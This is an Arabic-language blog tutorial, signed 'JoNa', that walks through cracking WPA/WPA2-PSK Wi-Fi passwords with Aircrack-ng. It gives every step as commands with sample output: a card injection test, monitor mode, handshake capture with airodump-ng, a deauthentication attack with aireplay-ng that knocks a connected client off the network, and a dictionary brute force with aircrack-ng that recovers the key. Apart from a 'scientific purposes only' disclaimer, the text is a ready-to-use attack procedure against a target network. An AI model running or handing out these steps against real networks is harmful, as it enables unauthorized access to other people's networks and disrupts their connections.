شرح كيفية فك تشفير شبكات الوايرلس التي تستخدم تشفير WPA/WPA2-PSK عن طريق عمل هجوم Brute force لاستخراج مفتاح الشبكة باسخدام مجموعة Aricrack-ng.

معلومات يجب أن تعرفها:

Wifi

  1. هذا المقال يشرح كيفية فك تشفير الشبكات التي تستخدم برورتوكول WPA/WPA2-PSK لذلك كن متاكدا من الشبكة المستهدفة تستخدم هذا البرورتوكول.
  2. نستخدم هجوم brute force لفك تشفير WPA/WPA2-PSK لأن المفتاح ليس ثابتا لذلك فان جمع الـ IV’S كانك تريد فك تشفير WEP لن ينفع وانما ما ينفع هنا هو الـ handshake بين الكلاينت والاكسس بوينت AP.
  3. يجب أن تعلم أيضا أن المفتاح الذي تريد تخمينه يمكن ان يكون طوله بين 8 و 63 من أرقام وحروف وحتى الرموز الخاصة.
  4. يستطيع الحاسوب تجريب ما بين 50 و 300 مفتاح في الثانية اعتمادا على سرعة المعالج وقوة الاشارة وقد يدوم الأمر لساعات ان لم يدم لأيام أو شهور. واذا كنت تريد عمل قاموس به جميع الاحتمالات من أرقام ورموز وحروف كبيرة وصغيرة فاعلم انه اذا كانت هناك شبكة تستخدم مفتاح يتكون من 5 خانات (ارقام – رموز – حروف كبيرة – حروف صغيرة ) واذا كان جهازك يستطيع تجريب 1000 كلمة في الثانية فان الزمن اللازم لتجريب كل الاحتمالات هو 4 شهور.

سأستخدم نظام لينوكس وحزمة Aircrack-ng. وأنبه ﻷن المقال للاغراض العلمية فقط.

 

قبل البدء بعملية الكسر – BEFORE THE CRACKING:

يجب ان يكون كرت الوايرلس الذي تستخدمه يدعم الحقن او الـ injection ولمعرفة ذلك استخدم الامر التالي :

aireplay-ng -9 -e JONA -a 00:de:af:da:c7:00 wlan0

9- تعني اختبار الحقن.
e- اسم الاكسس بوينت AP.
a- العنوان الفيزيائي للشبكة Mac adress.
wlan0 كرت الوايرلس

الناتج سيكون كالاتي:

11:01:06 ath0 channel: 9 11:01:06 Trying broadcast probe requests…
11:01:06 Injection is working!
11:01:07 Found 1 APs 11:01:07 Trying directed probe requests…
11:01:07 00:14:6C:7E:40:80 – channel: 9 – ‘JONA’
11:01:07 Ping (min/avg/max): 2.763ms/4.190ms/8.159ms
11:01:07 30/30: 100%

وأهم سطرين هما الثالث والاخير وهنا القيمة في السطر الاخير هي %100 وهذا يعني ان بامكاننا عمل injection للشبكة.

يجب ان تكون قريب كفاية من الشبكة المستهدفة لكي تستطيع ارسال الباكيت لها وتذكر ان اشارة الاكسس بوينت اقوى من اشارة كرت الوايرلس لديك وهذا يعني انك اذا كنت تستطيع استقبال الباكيت من الاكسس بوينت فذلك لا يعني انك تستطيع ارسال الباكيت.

 

الخطوات التي سنقوم بتنفيذها – CRACKING STEPS:

  1. وضع كرت الوايرلس في الوضع monitor وفي نفس القناة التي تستخدمها الاكسس بوينت.
  2. airodump-ng للحصول على الـ authentication handshake .
  3. aireplay-ng لفصل الكلاينت عن الشبكة.
  4. aircrack-ng لفك تشفير الـ PSK باستخدام الـ handshake.

 

عملية كسر تشفير شبكة الوايرلس – CRACKING:

نبدأ العملية بوضع كرت الوايرلس بالوضع monitor بتنفيذ الأمر التالي:

airmon-ng start wlan0 9

wlan0: كرت الوايرلس
9: القناة التي تستخدمها الاكسس بوينت

airodump-ng -c 9 –bssid 00:de:af:da:c7:00 -w psk wlan0

c- القناة التي تستخدمها الاكسس بوينت.
bssid– العنوان الفيزيائي للشبكة Mac adress.
w- اسم الملف الذي ستخزن به الباكيت او الحروف التي ستضاف لاسماء الباكيت للتمييز بينها.

أهم شيء هنا هو الـ handshake وسيظهر في أعلى يمين الشاشة . ويجب ان يكون جهاز متصل بالشبكة كلاينت.

aireplay-ng -0 1 -a 00:14:6C:7E:40:80 -c 00:0F:B5:FD:FB:C2 wlan0

0- تعني deauthentication 1 هي عدد الـ deauthentication التي سيتم ارسالها
a- هي العنوان الفيزيائي للاكسس بوينت mac adress.
c- العنوان الفيزيائي للكلاينت الذي سيتم فصله.

والناتج تقريبا كالاتي:

11:09:28 Sending DeAuth to station — STMAC: [00:0F:B5:34:30:30]

نفذ الأمر لكسر تشفير الملف واستخراج مفتاح الشبكة:

aircrack-ng -w password.lst -b 00:de:af:da:c7:00 psk*.cap

-w ملف المفاتيح الذي سيتم اختبارها
psk الاسم الذي اخترناه في الخطوة الاولى للباكيت.

والناتج سيكون كالاتي:

Aircrack-ng 0.8 [00:00:00] 2 keys tested (37.20 k/s)KEY FOUND! [ 123456 ]

Master Key : CD 69 0D 11 8E AC AA C5 C5 EC BB 59 85 7D 49 3E B8 A6 13 C5 4A 72 82 38 ED C3 7E 2C 59 5E AB FD

Transcient Key : 06 F8 BB F3 B1 55 AE EE 1F 66 AE 51 1F F8 12 98 CE 8A 9D A0 FC ED A6 DE 70 84 BA 90 83 7E CD 40 FF 1D 41 E1 65 17 93 0E 64 32 BF 25 50 D5 4A 5E 2B 20 90 8C EA 32 15 A6 26 62 93 27 66 66 E0 71

EAPOL HMAC : 4E 27 D9 5B 00 91 53 57 88 9C 66 C8 B1 29 D1 CB

واخيرا فان فك تشفير بروتوكول WPA-PSK مستحيل اذا كان المفتاح يتكون من اكثر من 20 خانة.

وأنبه مرة اخرى على ان الشرح للاغراض العلمية … JoNa